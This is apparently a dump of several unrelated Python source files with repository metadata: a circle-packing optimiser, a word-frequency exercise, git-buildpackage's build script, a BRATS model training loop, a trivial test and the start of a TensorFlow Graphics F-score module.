def MaxR(c1, c_list):
x = c1.x
y = c1.y
R_list = [1-x,1+x,1-y,1+y]
for i in range (len(c_list)):
c2 = c_list[i]
dis = c1.distance(c2)
R_list.append(dis-c2.radius)
return min(R_list)
#需要优化的目标函数
def func(c_list):
return lambda x : 1 - MaxR(circle(x[0], x[1], x[2]), c_list)
#找出最优圆心
def opt_center(c, c_list):
r = c.radius
x = c.x
y = c.y
rxy = [r,x,y]
bd_r = (0, 1)
bd_x = (-1, 1)
bd_y = (-1, 1)
bds = (bd_r, bd_x, bd_y)
res = minimize(func(c_list), rxy, method='SLSQP', bounds=bds)
c.x = res.x[1]
c.y = res.x[2]
c.radius = MaxR(c, c_list)
return c
#找m个圆,使得每个圆在邻域内半径最大
def FindMaxCircuit(m):
c_list = []
for i in range (m):
r = 0
x = random.uniform(-1, 1)
y = random.uniform(-1, 1)
c = circle(r, x, y)
while not c.ifcross(c_list):
x = random.uniform(-1, 1)
y = random.uniform(-1, 1)
c = circle(r, x, y)
c = opt_center(c, c_list)
c_list.append(c)
return c_list
def plot(c_list):
plt.figure()
plt.axes().set_aspect('equal')
plt.xlim([-1,1])
plt.ylim([-1,1])
theta = np.linspace(0,2*np.pi,50)
for c in c_list:
plt.plot(c.x+c.radius*np.cos(theta),c.y+c.radius*np.sin(theta),'b')
plt.show()
if __name__ == "__main__":
m = 60
c_list = FindMaxCircuit(m)
RR = 0
for c in c_list:
RR += c.radius**2
c.print_circle()
print('for {} circles, the maximize sum of r^2 = {}'.format(m, RR))
plot(c_list) | [
"noreply@github.com"
] | noreply@github.com |
6823c5360f70885ef30f899985476cec8c48d191 | e5c95e04821214d2f89bf9f48765dbe5ae04d3bf | /19100305/luokaiwen1022/mymodule/stats_word.py | 843077821e40dbc8c2d61d0b3834f6473bf35a65 | [] | no_license | qiming09/selfteaching-python-camp | 89270b98fa6080f4abe72f14ca0dd9441edbc493 | 48f5533ffa6fb7d82afa614346ad7e52e4e32e02 | refs/heads/master | 2020-04-29T16:25:59.059775 | 2019-04-02T06:45:02 | 2019-04-02T06:45:02 | 176,259,780 | 2 | 0 | null | 2019-03-18T10:34:32 | 2019-03-18T10:34:32 | null | UTF-8 | Python | false | false | 3,807 | py | # 示例字符串
string1 = '''
The Zen of Python, by Tim Peters
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
Sparse is better than dense.
Readability counts.
Special cases aren't special enough to break the rules.
Although practicality beats purity.
Errors should never pass silently.
Unless explicitly silenced.
In the face of ambxiguity, refuse the temptation to guess.
There should be one-- and preferably only one --obvious way to do it.
Although that way may not be obvious at first unless you're Dutch.
Now is better than never.
Although never is often better than *right* now.
If the implementation is hard to explain, it's a bad idea.
If the implementation is easy to explain, it may be a good idea.
Namespaces are one honking great idea -- let's do more of those!
Python是一种计算机程序设计语言。是一种动态的、面向对象的脚本语言,最初被设计用于编写自动化脚本(shell),随着版本的不断更新和语言新功能的添加,越来越多被用于独立的、大型项目的开发。
'''
import collections
import re
def stats_text_en(string_en):
''' 统计英文词频
第一步:过滤英文字符,并将string拆分为list。
第二步:清理*-等标点符号。
第三步:使用collections库中的Counter函数进行词频统计并输出统计结果。
'''
print("处理前的原始字符串\n\n",string_en)
result = re.sub("[^A-Za-z]", " ", string_en.strip())#把非A-Z和a-z的字符串全部去除掉
print("处理后的结果\n\n",result)
newList = result.split( )
i=0
for i in range(0,len(newList)):
newList[i]=newList[i].strip('*-,.?!')
if newList[i]==' ':
newList[i].remove(' ')
else:
i=i+1
# print('英文单词词频统计结果: ',collections.Counter(newList),'\n')
def stats_text_cn(string_cn):
''' 统计中文汉字字频
第一步:过滤汉字字符,并定义频率统计函数 stats()。
第二步:清除文本中的标点字符,将非标点字符组成新列表 new_list。
第三步:遍历列表,将字符同上一次循环中频率统计结果作为形参传给统计函数stats()。
第四步:统计函数在上一次统计结果基础上得出本次统计结果,赋值给newDict。
第五步:new_list遍历结束,输出倒序排列的统计结果。
'''
result1 = re.findall(u'[\u4e00-\u9fff]+', string_cn)
newString = ''.join(result1)
def stats(orgString, newDict) :
d = newDict
for m in orgString :
d[m] = d.get(m, 0) + 1
return d
new_list = []
for char in newString :
cn = char.strip('-*、。,:?!……')
new_list.append(cn)
words = dict()
for n in range(0,len(new_list)) :
words = stats(new_list[n],words)
newWords = sorted(words.items(), key=lambda item: item[1], reverse=True)
print('中文汉字字频统计结果: ',dict(newWords))
# 调用函数
stats_text_en(string1)
# stats_text_cn(string1)
# stats_text 函数,实现调用stats_text_en , stats_text_cn ,输出合并词频统计结果
import collections
import re
def stats_text_en(en) :
''' 英文词频统计'''
text_en = re.sub("[^A-Za-z]", " ", en.strip())
enList = text_en.split( )
return collections.Counter(enList)
def stats_text_cn(cn) :
''' 汉字字频统计 '''
cnList = re.findall(u'[\u4e00-\u9fff]+', cn.strip())
cnString = ''.join(cnList)
return collections.Counter(cnString)
def stats_text(text_en_cn) :
''' 合并英汉词频统计 '''
return (stats_text_en(text_en_cn)+stats_text_cn(text_en_cn)) | [
"48680863+luokaiwen1022@users.noreply.github.com"
] | 48680863+luokaiwen1022@users.noreply.github.com |
158643e767b1a1c837712b33c42139e665d84784 | bb0b9f5923e1ac4914b70c38a851fa3b8b92f154 | /gbp/scripts/buildpackage.py | d59a76d86c421a18c3c93d2ee34a8821b642b5f5 | [] | no_license | hzsunzixiang/git-buildpackage | 89a4ff667418325b8f31563545de437e5222ecd2 | 0a067f0e06f105ade703b8f4d56f379c5b30ccf2 | refs/heads/master | 2016-09-02T06:27:34.473182 | 2014-05-11T04:16:07 | 2014-05-11T04:16:07 | 19,658,170 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28,035 | py | # vim: set fileencoding=utf-8 :
#
# (C) 2006-2013 Guido Günther <agx@sigxcpu.org>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
"""run commands to build a debian package out of a git repository"""
import ConfigParser
import errno
import os, os.path
import sys
import time
import gbp.deb as du
from gbp.command_wrappers import (Command,
RunAtCommand, CommandExecFailed,
RemoveTree)
from gbp.config import (GbpOptionParserDebian, GbpOptionGroup)
from gbp.deb.git import (GitRepositoryError, DebianGitRepository)
from gbp.deb.source import DebianSource, DebianSourceError
from gbp.git.vfs import GitVfs
from gbp.errors import GbpError
import gbp.log
import gbp.notifications
from gbp.scripts.common.buildpackage import (index_name, wc_name,
git_archive_submodules,
git_archive_single, dump_tree,
write_wc, drop_index)
from gbp.pkg import (UpstreamSource, compressor_opts, compressor_aliases)
def git_archive(repo, cp, output_dir, treeish, comp_type, comp_level, with_submodules):
"create a compressed orig tarball in output_dir using git_archive"
try:
comp_opts = compressor_opts[comp_type][0]
except KeyError:
raise GbpError("Unsupported compression type '%s'" % comp_type)
output = os.path.join(output_dir, du.orig_file(cp, comp_type))
prefix = "%s-%s" % (cp['Source'], cp['Upstream-Version'])
try:
if repo.has_submodules() and with_submodules:
repo.update_submodules()
git_archive_submodules(repo, treeish, output, prefix,
comp_type, comp_level, comp_opts)
else:
git_archive_single(treeish, output, prefix,
comp_type, comp_level, comp_opts)
except (GitRepositoryError, CommandExecFailed):
gbp.log.err("Error generating submodules' archives")
return False
except OSError as err:
gbp.log.err("Error creating %s: %s" % (output, err[0]))
return False
except GbpError:
raise
except Exception as e:
gbp.log.err("Error creating %s: %s" % (output, e))
return False
return True
def prepare_upstream_tarball(repo, cp, options, tarball_dir, output_dir):
"""
Make sure we have an upstream tarball. This involves loooking in
tarball_dir, symlinking or building it.
"""
options.comp_type = guess_comp_type(repo,
options.comp_type,
cp,
options.tarball_dir)
orig_file = du.orig_file(cp, options.comp_type)
# look in tarball_dir first, if found force a symlink to it
if options.tarball_dir:
gbp.log.debug("Looking for orig tarball '%s' at '%s'" % (orig_file, tarball_dir))
if not du.DebianPkgPolicy.symlink_orig(orig_file, tarball_dir, output_dir, force=True):
gbp.log.info("Orig tarball '%s' not found at '%s'" % (orig_file, tarball_dir))
else:
gbp.log.info("Orig tarball '%s' found at '%s'" % (orig_file, tarball_dir))
# build an orig unless the user forbids it, always build (and overwrite pre-existing) if user forces it
if options.force_create or (not options.no_create_orig and not du.DebianPkgPolicy.has_orig(orig_file, output_dir)):
if not pristine_tar_build_orig(repo, cp, output_dir, options):
upstream_tree = git_archive_build_orig(repo, cp, output_dir, options)
if options.pristine_tar_commit:
if repo.pristine_tar.has_commit(cp.name,
cp.upstream_version,
options.comp_type):
gbp.log.debug("%s already on pristine tar branch" %
orig_file)
else:
archive = os.path.join(output_dir, orig_file)
gbp.log.debug("Adding %s to pristine-tar branch" %
archive)
repo.pristine_tar.commit(archive, upstream_tree)
#{ Functions to handle export-dir
def write_tree(repo, options):
"""
Write a tree of the index or working copy if necessary
@param repo: the git repository we're acting on
@type repo: L{GitRepository}
@return: the sha1 of the tree
@rtype: C{str}
"""
if options.export_dir:
if options.export == index_name:
tree = repo.write_tree()
elif options.export == wc_name:
tree = write_wc(repo)
else:
tree = options.export
if not repo.has_treeish(tree):
raise GbpError("%s is not a valid treeish" % tree)
else:
tree = None
return tree
def export_source(repo, tree, source, options, dest_dir, tarball_dir):
"""
Export a version of the source tree when building in a separate directory
@param repo: the git repository to export from
@type repo: L{gbp.git.GitRepository}
@param source: the source package
@param options: options to apply
@param dest_dir: where to export the source to
@param tarball_dir: where to fetch the tarball from in overlay mode
@returns: the temporary directory
"""
# Extract orig tarball if git-overlay option is selected:
if options.overlay:
if source.is_native():
raise GbpError("Cannot overlay Debian native package")
extract_orig(os.path.join(tarball_dir,
du.orig_file(source.changelog,
options.comp_type)),
dest_dir)
gbp.log.info("Exporting '%s' to '%s'" % (options.export, dest_dir))
if not dump_tree(repo, dest_dir, tree, options.with_submodules):
raise GbpError
def move_old_export(target):
"""move a build tree away if it exists"""
try:
os.mkdir(target)
except OSError as (e, msg):
if e == errno.EEXIST:
os.rename(target, "%s.obsolete.%s" % (target, time.time()))
def extract_orig(orig_tarball, dest_dir):
"""extract orig tarball to export dir before exporting from git"""
gbp.log.info("Extracting %s to '%s'" % (os.path.basename(orig_tarball), dest_dir))
move_old_export(dest_dir)
upstream = UpstreamSource(orig_tarball)
upstream.unpack(dest_dir)
# Check if tarball extracts into a single folder or not:
if upstream.unpacked != dest_dir:
# If it extracts a single folder, move its contents to dest_dir:
gbp.log.debug("Moving %s to %s" % (upstream.unpacked, dest_dir))
tmpdir = dest_dir + '.new'
os.rename(upstream.unpacked, tmpdir)
os.rmdir(dest_dir)
os.rename(tmpdir, dest_dir)
#}
def source_vfs(repo, options, tree):
"""Init source package info either from git or from working copy"""
# FIXME: just init the correct vfs
try:
if tree:
source = DebianSource(GitVfs(repo, tree))
else:
source = DebianSource('.')
source.is_native() # check early if this works
except Exception as e:
raise GbpError("Can't determine package type: %s" % e)
return source
def prepare_output_dir(dir):
"""Prepare the directory where the build result will be put"""
output_dir = dir
if not dir:
output_dir = '..'
output_dir = os.path.abspath(output_dir)
try:
os.mkdir(output_dir)
except OSError as (e, msg):
if e != errno.EEXIST:
raise GbpError("Cannot create output dir %s" % output_dir)
return output_dir
def pristine_tar_build_orig(repo, cp, output_dir, options):
"""
build orig using pristine-tar
@return: True: orig tarball build, False: noop
"""
if options.pristine_tar:
if not repo.has_branch(repo.pristine_tar_branch):
gbp.log.warn('Pristine-tar branch "%s" not found' %
repo.pristine_tar.branch)
try:
repo.pristine_tar.checkout(cp.name,
cp.upstream_version,
options.comp_type,
output_dir)
return True
except CommandExecFailed:
if options.pristine_tar_commit:
gbp.log.debug("pristine-tar checkout failed, "
"will commit tarball due to "
"'--pristine-tar-commit'")
else:
raise
return False
def get_upstream_tree(repo, cp, options):
"""Determine the upstream tree from the given options"""
if options.upstream_tree.upper() == 'TAG':
upstream_tree = repo.version_to_tag(options.upstream_tag,
cp['Upstream-Version'])
elif options.upstream_tree.upper() == 'BRANCH':
if not repo.has_branch(options.upstream_branch):
raise GbpError("%s is not a valid branch" % options.upstream_branch)
upstream_tree = options.upstream_branch
else:
upstream_tree = options.upstream_tree
if not repo.has_treeish(upstream_tree):
raise GbpError("%s is not a valid treeish" % upstream_tree)
return upstream_tree
def git_archive_build_orig(repo, cp, output_dir, options):
"""
Build orig tarball using git-archive
@param cp: the changelog of the package we're acting on
@type cp: L{ChangeLog}
@param output_dir: where to put the tarball
@type output_dir: C{Str}
@param options: the parsed options
@type options: C{dict} of options
@return: the tree we built the tarball from
@rtype: C{str}
"""
upstream_tree = get_upstream_tree(repo, cp, options)
gbp.log.info("%s does not exist, creating from '%s'" % (du.orig_file(cp,
options.comp_type),
upstream_tree))
gbp.log.debug("Building upstream tarball with compression '%s -%s'" %
(options.comp_type, options.comp_level))
if not git_archive(repo, cp, output_dir, upstream_tree,
options.comp_type,
options.comp_level,
options.with_submodules):
raise GbpError("Cannot create upstream tarball at '%s'" % output_dir)
return upstream_tree
def guess_comp_type(repo, comp_type, cp, tarball_dir):
"""Guess compression type"""
srcpkg = cp['Source']
upstream_version = cp['Upstream-Version']
if comp_type != 'auto':
comp_type = compressor_aliases.get(comp_type, comp_type)
try:
dummy = compressor_opts[comp_type]
except KeyError:
gbp.log.warn("Unknown compression type - guessing.")
comp_type = 'auto'
if comp_type == 'auto':
if not repo.has_pristine_tar_branch():
if not tarball_dir:
tarball_dir = '..'
detected = None
for comp in compressor_opts.keys():
if du.DebianPkgPolicy.has_orig(du.orig_file(cp, comp), tarball_dir):
if detected is not None:
raise GbpError("Multiple orig tarballs found.")
detected = comp
if detected is not None:
comp_type = detected
else:
comp_type = 'gzip'
else:
regex = 'pristine-tar .* %s_%s\.orig.tar\.' % (srcpkg, upstream_version)
commits = repo.grep_log(regex, repo.pristine_tar_branch)
if commits:
commit = commits[-1]
gbp.log.debug("Found pristine-tar commit at '%s'" % commit)
else:
commit = repo.pristine_tar_branch
tarball = repo.get_subject(commit)
comp_type = du.DebianPkgPolicy.get_compression(tarball)
gbp.log.debug("Determined compression type '%s'" % comp_type)
if not comp_type:
comp_type = 'gzip'
gbp.log.warn("Unknown compression type of %s, assuming %s" % (tarball, comp_type))
return comp_type
def setup_pbuilder(options):
"""setup everything to use git-pbuilder"""
if options.use_pbuilder or options.use_qemubuilder:
options.builder = 'git-pbuilder'
options.cleaner = '/bin/true'
os.environ['DIST'] = options.pbuilder_dist
if options.pbuilder_arch:
os.environ['ARCH'] = options.pbuilder_arch
if options.use_qemubuilder:
os.environ['BUILDER'] = "qemubuilder"
if not options.pbuilder_autoconf:
os.environ['GIT_PBUILDER_AUTOCONF'] = "no"
if options.pbuilder_options:
os.environ['GIT_PBUILDER_OPTIONS'] = options.pbuilder_options
def disable_hooks(options):
"""Disable all hooks (except for builder)"""
for hook in ['cleaner', 'postexport', 'prebuild', 'postbuild', 'posttag']:
if getattr(options, hook):
gbp.log.info("Disabling '%s' hook" % hook)
setattr(options, hook, '')
def parse_args(argv, prefix):
args = [ arg for arg in argv[1:] if arg.find('--%s' % prefix) == 0 ]
dpkg_args = [ arg for arg in argv[1:] if arg.find('--%s' % prefix) == -1 ]
# We handle these although they don't have a --git- prefix
for arg in [ "--help", "-h", "--version" ]:
if arg in dpkg_args:
args.append(arg)
try:
parser = GbpOptionParserDebian(command=os.path.basename(argv[0]), prefix=prefix)
except ConfigParser.ParsingError as err:
gbp.log.err(err)
return None, None, None
tag_group = GbpOptionGroup(parser, "tag options", "options related to git tag creation")
branch_group = GbpOptionGroup(parser, "branch options", "branch layout options")
cmd_group = GbpOptionGroup(parser, "external command options", "how and when to invoke external commands and hooks")
orig_group = GbpOptionGroup(parser, "orig tarball options", "options related to the creation of the orig tarball")
export_group = GbpOptionGroup(parser, "export build-tree options", "alternative build tree related options")
parser.add_option_group(tag_group)
parser.add_option_group(orig_group)
parser.add_option_group(branch_group)
parser.add_option_group(cmd_group)
parser.add_option_group(export_group)
parser.add_boolean_config_file_option(option_name = "ignore-new", dest="ignore_new")
parser.add_option("--git-verbose", action="store_true", dest="verbose", default=False,
help="verbose command execution")
parser.add_config_file_option(option_name="color", dest="color", type='tristate')
parser.add_config_file_option(option_name="color-scheme",
dest="color_scheme")
parser.add_config_file_option(option_name="notify", dest="notify", type='tristate')
tag_group.add_option("--git-tag", action="store_true", dest="tag", default=False,
help="create a tag after a successful build")
tag_group.add_option("--git-tag-only", action="store_true", dest="tag_only", default=False,
help="don't build, only tag and run the posttag hook")
tag_group.add_option("--git-retag", action="store_true", dest="retag", default=False,
help="don't fail if the tag already exists")
tag_group.add_boolean_config_file_option(option_name="sign-tags", dest="sign_tags")
tag_group.add_config_file_option(option_name="keyid", dest="keyid")
tag_group.add_config_file_option(option_name="debian-tag", dest="debian_tag")
tag_group.add_config_file_option(option_name="upstream-tag", dest="upstream_tag")
orig_group.add_config_file_option(option_name="upstream-tree", dest="upstream_tree")
orig_group.add_boolean_config_file_option(option_name="pristine-tar", dest="pristine_tar")
orig_group.add_boolean_config_file_option(option_name="pristine-tar-commit",
dest="pristine_tar_commit")
orig_group.add_config_file_option(option_name="force-create", dest="force_create",
help="force creation of orig tarball", action="store_true")
orig_group.add_config_file_option(option_name="no-create-orig", dest="no_create_orig",
help="don't create orig tarball", action="store_true")
orig_group.add_config_file_option(option_name="tarball-dir", dest="tarball_dir", type="path",
help="location to look for external tarballs")
orig_group.add_config_file_option(option_name="compression", dest="comp_type",
help="Compression type, default is '%(compression)s'")
orig_group.add_config_file_option(option_name="compression-level", dest="comp_level",
help="Compression level, default is '%(compression-level)s'")
branch_group.add_config_file_option(option_name="upstream-branch", dest="upstream_branch")
branch_group.add_config_file_option(option_name="debian-branch", dest="debian_branch")
branch_group.add_boolean_config_file_option(option_name = "ignore-branch", dest="ignore_branch")
branch_group.add_boolean_config_file_option(option_name = "submodules", dest="with_submodules")
cmd_group.add_config_file_option(option_name="builder", dest="builder",
help="command to build the Debian package, default is '%(builder)s'")
cmd_group.add_config_file_option(option_name="cleaner", dest="cleaner",
help="command to clean the working copy, default is '%(cleaner)s'")
cmd_group.add_config_file_option(option_name="prebuild", dest="prebuild",
help="command to run before a build, default is '%(prebuild)s'")
cmd_group.add_config_file_option(option_name="postexport", dest="postexport",
help="command to run after exporting the source tree, default is '%(postexport)s'")
cmd_group.add_config_file_option(option_name="postbuild", dest="postbuild",
help="hook run after a successful build, default is '%(postbuild)s'")
cmd_group.add_config_file_option(option_name="posttag", dest="posttag",
help="hook run after a successful tag operation, default is '%(posttag)s'")
cmd_group.add_boolean_config_file_option(option_name="pbuilder", dest="use_pbuilder")
cmd_group.add_boolean_config_file_option(option_name="qemubuilder", dest="use_qemubuilder")
cmd_group.add_config_file_option(option_name="dist", dest="pbuilder_dist")
cmd_group.add_config_file_option(option_name="arch", dest="pbuilder_arch")
cmd_group.add_boolean_config_file_option(option_name = "pbuilder-autoconf", dest="pbuilder_autoconf")
cmd_group.add_config_file_option(option_name="pbuilder-options", dest="pbuilder_options")
cmd_group.add_boolean_config_file_option(option_name="hooks", dest="hooks")
export_group.add_config_file_option(option_name="export-dir", dest="export_dir", type="path",
help="before building the package export the source into EXPORT_DIR, default is '%(export-dir)s'")
export_group.add_config_file_option("export", dest="export",
help="export treeish object TREEISH, default is '%(export)s'", metavar="TREEISH")
export_group.add_boolean_config_file_option(option_name="purge", dest="purge")
export_group.add_option("--git-dont-purge", action="store_true", dest="dont_purge", default=False,
help="deprecated, use --git-no-purge instead")
export_group.add_boolean_config_file_option(option_name="overlay", dest="overlay")
options, args = parser.parse_args(args)
gbp.log.setup(options.color, options.verbose, options.color_scheme)
if not options.hooks:
disable_hooks(options)
if options.retag:
if not options.tag and not options.tag_only:
gbp.log.err("'--%sretag' needs either '--%stag' or '--%stag-only'" % (prefix, prefix, prefix))
return None, None, None
if options.overlay and not options.export_dir:
gbp.log.err("Overlay must be used with --git-export-dir")
return None, None, None
# --git-dont-purge is deprecated:
if options.dont_purge:
gbp.log.warning("--git-dont-purge is depreceted, use --git-no-purge instead")
options.purge = False
return options, args, dpkg_args
def main(argv):
retval = 0
prefix = "git-"
source = None
branch = None
options, gbp_args, dpkg_args = parse_args(argv, prefix)
if not options:
return 1
try:
repo = DebianGitRepository(os.path.curdir)
except GitRepositoryError:
gbp.log.err("%s is not a git repository" % (os.path.abspath('.')))
return 1
else:
repo_dir = os.path.abspath(os.path.curdir)
try:
Command(options.cleaner, shell=True)()
if not options.ignore_new:
(ret, out) = repo.is_clean()
if not ret:
gbp.log.err("You have uncommitted changes in your source tree:")
gbp.log.err(out)
raise GbpError("Use --git-ignore-new to ignore.")
try:
branch = repo.get_branch()
except GitRepositoryError:
# Not being on any branch is o.k. with --git-ignore-branch
if not options.ignore_branch:
raise
if not options.ignore_new and not options.ignore_branch:
if branch != options.debian_branch:
gbp.log.err("You are not on branch '%s' but on '%s'" % (options.debian_branch, branch))
raise GbpError("Use --git-ignore-branch to ignore or --git-debian-branch to set the branch name.")
tree = write_tree(repo, options)
source = source_vfs(repo, options, tree)
if not options.tag_only:
output_dir = prepare_output_dir(options.export_dir)
tarball_dir = options.tarball_dir or output_dir
# Get/build the upstream tarball if necessary. We delay this in
# case of a postexport hook so the hook gets a chance to modify the
# sources and create different tarballs (#640382)
# We don't delay it in general since we want to fail early if the
# tarball is missing.
if not source.is_native():
if options.postexport:
gbp.log.info("Postexport hook set, delaying tarball creation")
else:
prepare_upstream_tarball(repo, source.changelog, options, tarball_dir,
output_dir)
# Export to another build dir if requested:
if options.export_dir:
tmp_dir = os.path.join(output_dir, "%s-tmp" % source.sourcepkg)
export_source(repo, tree, source.changelog, options, tmp_dir, output_dir)
# Run postexport hook
if options.postexport:
RunAtCommand(options.postexport, shell=True,
extra_env={'GBP_GIT_DIR': repo.git_dir,
'GBP_TMP_DIR': tmp_dir})(dir=tmp_dir)
major = (source.changelog.debian_version if source.is_native()
else source.changelog.upstream_version)
export_dir = os.path.join(output_dir, "%s-%s" % (source.sourcepkg, major))
gbp.log.info("Moving '%s' to '%s'" % (tmp_dir, export_dir))
move_old_export(export_dir)
os.rename(tmp_dir, export_dir)
# Delayed tarball creation in case a postexport hook is used:
if not source.is_native() and options.postexport:
prepare_upstream_tarball(repo, source.changelog, options, tarball_dir,
output_dir)
if options.export_dir:
build_dir = export_dir
else:
build_dir = repo_dir
if options.prebuild:
RunAtCommand(options.prebuild, shell=True,
extra_env={'GBP_GIT_DIR': repo.git_dir,
'GBP_BUILD_DIR': build_dir})(dir=build_dir)
setup_pbuilder(options)
# Finally build the package:
RunAtCommand(options.builder, dpkg_args, shell=True,
extra_env={'GBP_BUILD_DIR': build_dir})(dir=build_dir)
if options.postbuild:
arch = os.getenv('ARCH', None) or du.get_arch()
changes = os.path.abspath("%s/../%s_%s_%s.changes" %
(build_dir,
source.sourcepkg,
source.changelog.noepoch, arch))
gbp.log.debug("Looking for changes file %s" % changes)
if not os.path.exists(changes):
changes = os.path.abspath("%s/../%s_%s_source.changes" %
(build_dir,
source.sourcepkg,
source.changelog.noepoch))
Command(options.postbuild, shell=True,
extra_env={'GBP_CHANGES_FILE': changes,
'GBP_BUILD_DIR': build_dir})()
if options.tag or options.tag_only:
gbp.log.info("Tagging %s" % source.changelog.version)
tag = repo.version_to_tag(options.debian_tag, source.changelog.version)
if options.retag and repo.has_tag(tag):
repo.delete_tag(tag)
repo.create_tag(name=tag,
msg="%s Debian release %s" % (source.sourcepkg,
source.changelog.version),
sign=options.sign_tags, keyid=options.keyid)
if options.posttag:
sha = repo.rev_parse("%s^{}" % tag)
Command(options.posttag, shell=True,
extra_env={'GBP_TAG': tag,
'GBP_BRANCH': branch or '(no branch)',
'GBP_SHA1': sha})()
except CommandExecFailed:
retval = 1
except (GbpError, GitRepositoryError) as err:
if len(err.__str__()):
gbp.log.err(err)
retval = 1
except DebianSourceError as err:
gbp.log.err(err)
source = None
retval = 1
finally:
drop_index()
if not options.tag_only:
if options.export_dir and options.purge and not retval:
RemoveTree(export_dir)()
if source and not gbp.notifications.notify(source.changelog,
not retval,
options.notify):
gbp.log.err("Failed to send notification")
retval = 1
return retval
if __name__ == '__main__':
sys.exit(main(sys.argv))
# vim:et:ts=4:sw=4:et:sts=4:ai:set list listchars=tab\:»·,trail\:·:
| [
"haichengsun123@163.com"
] | haichengsun123@163.com |
b513f222fdaffe800eb13434b6c68a58cf123706 | 94becda0e99eb1bf23f2649d63a6a2af0f631e33 | /brats/bak/loop_finetune_v100_bak.py | fc472ca5384a7149a43deaf323fcf73f85ea7cfd | [
"MIT"
] | permissive | guusgrimbergen/3DUnetCNN_BRATS | d560a878dfbe7dfe95ca5a37c8b066199300d276 | 1c4ad386b66c550770adc8c9e7371c1ce476db94 | refs/heads/master | 2022-01-08T13:37:05.253386 | 2019-06-17T13:10:59 | 2019-06-17T13:10:59 | 185,376,310 | 0 | 0 | null | 2019-05-07T10:07:33 | 2019-05-07T10:07:32 | null | UTF-8 | Python | false | false | 3,151 | py | from brats.config import config, config_unet, config_dict
import datetime
import logging
import threading
import subprocess
import os
import sys
from subprocess import Popen, PIPE, STDOUT
from unet3d.utils.path_utils import make_dir
from unet3d.utils.path_utils import get_model_h5_filename
from unet3d.utils.path_utils import get_filename_without_extension
config.update(config_unet)
# pp = pprint.PrettyPrinter(indent=4)
# # pp.pprint(config)
config.update(config_unet)
def run(model_filename, out_file, cmd):
print("="*120)
print(">> processing:", cmd)
print("log to:", out_file)
print(cmd)
os.system(cmd)
task = "finetune"
is_test = "0"
model_list = list()
cmd_list = list()
out_file_list = list()
for model_name in ["unet", "isensee"]:
for is_denoise in config_dict["is_denoise"]:
for is_normalize in config_dict["is_normalize"]:
for is_hist_match in ["0", "1"]:
for loss in ["minh", "weighted"]:
patch_shape = "160-192-128"
log_folder = "log"
make_dir(log_folder)
d = datetime.date.today()
year_current = d.year
month_current = '{:02d}'.format(d.month)
date_current = '{:02d}'.format(d.day)
model_filename = get_filename_without_extension(get_model_h5_filename(
datatype="model",
is_bias_correction="1",
is_denoise=is_denoise,
is_normalize=is_normalize,
is_hist_match=is_hist_match,
depth_unet=4,
n_base_filters_unet=16,
model_name=model_name,
patch_shape=patch_shape,
is_crf="0",
is_test=is_test,
loss=loss,
model_dim=2))
out_file = "{}/{}{}{}_{}_out.log".format(
log_folder,
year_current,
month_current,
date_current,
model_filename)
cmd = "python brats/{}.py -t \"{}\" -o \"0\" -n \"{}\" -de \"{}\" -hi \"{}\" -ps \"{}\" -l \"{}\" -m \"{}\" -ba 1 -dim 3".format(
task,
is_test,
is_normalize,
is_denoise,
is_hist_match,
patch_shape,
"minh",
model_name
)
model_list.append(model_filename)
out_file_list.append(out_file)
cmd_list.append(cmd)
import random
combined = list(zip(model_list, out_file_list, cmd_list))
random.shuffle(combined)
model_list[:], out_file_list[:], cmd_list = zip(*combined)
for i in range(len(model_list)):
model_filename = model_list[i]
out_file = out_file_list[i]
cmd = cmd_list[i]
run(model_filename, out_file, cmd) | [
"minhmanutd@gmail.com"
] | minhmanutd@gmail.com |
4b2d690ae6f95c54796fa8e489349c37bedc6da5 | 240544a6e94996ae58f9e37a854dfeef888dfd9d | /nosetests.py | ff9698c6b62f87de52c23dd31a6324e817c09c64 | [
"MIT"
] | permissive | jankoslavic/py-tools | e7808e78fca97950f8e5d3e6cdb3156bb8dd5968 | dfc79507e90e1beaa8297fb48b197990b24d0929 | refs/heads/master | 2021-01-01T06:51:05.556669 | 2020-12-28T06:17:38 | 2020-12-28T06:17:38 | 37,326,059 | 15 | 11 | null | 2016-02-07T19:34:11 | 2015-06-12T14:18:53 | Jupyter Notebook | UTF-8 | Python | false | false | 40 | py | def test_numbers():
assert 12 == 12
| [
"janko.slavic@gmail.com"
] | janko.slavic@gmail.com |
35af21c694adef7b09cbc80926fda010c74caf6e | 7a6aca7d300c0752f2a73730b743a1a7361e941b | /tensorflow_graphics/nn/metric/fscore.py | 8bb696c3919b2925c77ede8d7b9ae9e1851fd458 | [
"Apache-2.0"
] | permissive | tensorflow/graphics | ef0abe102398a58eb7c41b709393df3d0b0a2811 | 1b0203eb538f2b6a1013ec7736d0d548416f059a | refs/heads/master | 2023-09-03T20:41:25.992578 | 2023-08-08T21:16:36 | 2023-08-08T21:17:31 | 164,626,274 | 2,920 | 413 | Apache-2.0 | 2023-08-27T14:26:47 | 2019-01-08T10:39:44 | Python | UTF-8 | Python | false | false | 3,437 | py | # Copyright 2020 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module implements the fscore metric."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from typing import Any, Callable
import tensorflow as tf
from tensorflow_graphics.nn.metric import precision as precision_module
from tensorflow_graphics.nn.metric import recall as recall_module
from tensorflow_graphics.util import export_api
from tensorflow_graphics.util import safe_ops
from tensorflow_graphics.util import shape
from tensorflow_graphics.util import type_alias
def evaluate(ground_truth: type_alias.TensorLike,
prediction: type_alias.TensorLike,
precision_function: Callable[..., Any] = precision_module.evaluate,
recall_function: Callable[..., Any] = recall_module.evaluate,
